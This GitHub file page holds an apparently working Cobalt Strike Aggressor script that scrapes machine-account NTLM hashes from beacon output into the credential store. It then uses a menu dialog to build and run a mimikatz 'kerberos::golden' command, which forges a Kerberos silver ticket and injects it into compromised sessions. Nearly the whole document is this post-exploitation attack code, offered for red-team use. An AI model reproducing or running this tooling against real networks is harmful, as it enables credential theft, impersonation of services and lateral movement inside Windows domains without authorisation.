Permalink
Switch branches/tags
Nothing to show
Find file Copy path
2a59066 Apr 12, 2017
0 contributors

Users who have contributed to this file

80 lines (66 sloc) 2.89 KB
# author: bluescreenofjeff
#GUI to make Silver Tickets for a session. monitors output for machine hashes and adds them to the cred store
#set global settings so user, domain, sid, service, and purge settings persist across usage
%globalsettings['user'] = '';
%globalsettings['domain'] = 'example.local';
%globalsettings['domain-sid'] = 'S-1-5-21-000000000-1111111111-2222222222';
%globalsettings['service'] = 'cifs';
%globalsettings['purge'] = 'false';
#silver ticket monitor - monitors beacon output and adds machine accounts to cred store
on beacon_output {
if ($2 hasmatch 'Username : (.*\$).*[\n\r].*Domain : (.*)[\n\r].*NTLM : (.*)[\n\r]') {
local('$machineaccount $domain $machinehash');
$machineaccount = matched()[0];
$domain = matched()[1];
$machinehash = matched()[2];
credential_add($machineaccount,$machinehash,$domain,"Silver Ticket Monitor",binfo($1,"internal"));
}
}
#ticket generator gui
sub silver-ticket {
@bids = $1;
@machinescompromised = @();
#make list of machine hashes compromised, place in array
foreach $entry (credentials()) {
if ($entry['user'] ismatch '(.*)\$') {
$temp = matched()[0] . " - $entry['password']";
if ($temp !in @machinescompromised) {
add(@machinescompromised, matched()[0] . " - $entry['password']");
}
}
}
$dialog = dialog("Silver Ticket", %(user => %globalsettings['user'], domain => %globalsettings['domain'], domain-sid => %globalsettings['domain-sid'], service => %globalsettings['service'], purge => %globalsettings['purge']), lambda({
#save configurations to global settings
%globalsettings['user'] = $3['user'];
%globalsettings['domain'] = $3['domain'];
%globalsettings['domain-sid'] = $3['domain-sid'];
%globalsettings['service'] = $3['service'];
%globalsettings['purge'] = $3['purge'];
foreach $bid (@bids){
if ($3['purge'] eq 'true') {
binput($bid,'mimikatz kerberos::purge');
bmimikatz($bid,'kerberos::purge');
}
$targethost = split(' - ',$3['target'])[0];
$targethash = split(' - ',$3['target'])[1];
$mimikatz_command = "kerberos::golden /user: $+ $3['user'] /domain: $+ $3['domain'] /sid: $+ $3['domain-sid'] /target: $+ $targethost $+ \. $+ $3['domain'] /rc4: $+ $targethash /service: $+ $3['service'] /ptt";
binput($bid,"mimikatz $mimikatz_command");
bmimikatz($bid,$mimikatz_command);
};
}));
dialog_description($dialog, "This dialog generates a silver ticket for the chosen service and injects it into the current session.");
drow_text($dialog, "user", "User:");
drow_text($dialog, "domain", "Domain FQDN:");
drow_text($dialog, "domain-sid", "Domain SID:");
drow_combobox($dialog, "target", "Target Host:", @machinescompromised);
drow_text($dialog, "service", "Service:");
drow_checkbox($dialog, "purge", "Purge Kerberos Tray First?");
dbutton_action($dialog, "Build");
dialog_show($dialog);
}
#context menu
popup beacon_bottom {
item "Silver Ticket" {
silver-ticket($1);
}
}